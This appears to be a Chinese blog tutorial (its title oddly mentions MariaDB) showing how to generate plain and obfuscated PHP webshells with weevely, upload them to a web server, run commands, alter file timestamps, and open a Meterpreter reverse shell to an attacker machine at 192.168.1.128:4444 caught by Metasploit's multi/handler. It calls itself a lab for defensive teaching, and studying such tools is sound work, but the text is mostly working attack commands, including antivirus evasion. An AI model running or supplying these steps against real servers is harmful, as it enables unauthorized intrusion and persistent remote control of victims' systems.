mariadb php无法连接_weevely生成木马反向连接msf

8173be48f49cb5dd44b0b7d8a5f89822.png 一位苦于信息安全的萌新小白帽 本实验仅用于信息防御教学,切勿用于它用途 公众号:XG小刚  小实验 
目的 今天使用一下kali系统下的中国菜刀 weevely ,生成木马文件、混淆木马文件控制Web服务器,并进一步 反弹shell 给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境
1.phpstudy搭建主机 192.168.1.1
2.kali 192.168.1.128  Weevely 
介绍 weevely是一款使用python编写的webshell工具,很多说是linux下的中国菜刀,但只能用于PHP。 weevely在 linux 上使用非常给力,但是在windows上很多模块无法使用 4cbab6aab88cce1e171280b7e82a5f5e.png 使用
生成shellwevely generate
连接shellweevely [cmd]
生成混淆shellweevely generate -obfuscator
 实验 
使用weevely生成php木马文件
weevely generate XG ~/shell.php
88f95bca46a6e4419f3081ae4ef7bdf2.png 这里看到,生成一个大小779byte大小的PHP木马文件,密码是XG,文件名shell.php
上面生成的是 普通木马 文件,下面生成的是基于weevely模板生成的 混淆木马 ,起到一定的 防查杀 作用  (实际作用不大,照样能被腾讯、360全家桶扫出来。) b500c18d9bfcdd2bcf37e4808f0e92ff.png weevely generate -h 查看参数,其中  -obfuscator 是用来使用混淆模板的,有两个自带模板,我们使用第二个生成木马文件shell2.php
weevely generate -obfuscator cleartext1_php XG shell2.php
1c47117f334dd651111b44cce63af760.png

将木马文件上传到被攻击web服务器

这里的上传过程看你要攻击的站点了,有文件上传漏洞,代码执行等等,反正能把木马文件上传到web目录下就行。并要知道木马所在的文件目录。
由于是我自己搭建的web,就直接拖拽进去了。开启phpstudy。

d7e1e6f66974b0a1fd93a9ac20131e48.png 找到shell.php所在的目录 dac22822ca337382cbfac0cefb5009c1.png 打来shell.php发现是 空白文件 ,这是正常现象。能打开,说明shell.php文件能正常执行.
然后复制url链接 dc8d264a7902d87964f9b39120d1867f.png

使用weevely连接木马文件

weevely http://192.168.1.1/shell/shell.php XG
4ad03b923dbbe41c28eeac6390322a16.png 查看ip地址,已经连接到主机192.168.1.1 cc37227b6ae33b25e26e0cd7f2cbfe21.png 同样的方式,连接生成的混淆shell2.php efc6284326d4040dfe2ae3c3968b5c92.png

控制参数

连接上shell就相当于控制服务器了,可以在weevely状态下发?来查看可以使用的命令,这里列出几个常用命令。

信息搜集::system_info收集系统信息:system_info -info client_ip whoami hostname查找自己连接的ip文件管理:file_touch 修改文件时间:file_touch -human-ts '2018-09-15 200:41:20' 文件名命令执行:shell_php 执行PHP命令:shell_php system('dir');

反向shell连接msf

连接上的weevely功能虽然很强大了,但是不要忘了更强的神器metasploit,我们可以使用weevely转发到msf进而最深度的控制服务器。
在这使用:backdoor_meterpreter参数

weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.1.128 -port 4444

5617319f24a0bf9ced4917f36e232def.png

:backdoor_meterpreter反向shell
-payload php/meterpreter/reverse_tcp是搭载的攻击载荷
-lhost转发给监听的ip地址
-port就是监听端口了

转发完成,接下来就是打开msf使用监听模块监听,获取控制权

use exploit/multi/handlershow payloadsset payload php/meterpreter/reverse_tcpset Lhost 192.168.1.128

3a947b1ce5f42447b7146ae04d671c91.png

最后run一下就可以监听到,并进一步控制web服务器了。

总结


weevely用起来也算是菜刀的一种变形,但是搭配起msf可以说是无敌的存在。
weevely在Linux下使用很友好,但在windows下还是使用菜刀,蚁剑和冰蝎吧。


msf控制后的使用命令特别特别多,功能特别强大,所以说msf是渗透神器嘛。(提醒一下,真正进行渗透时的ip地址,要么两个主机在同一个内网网段,要么在同一个公网,不然连接不上。)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值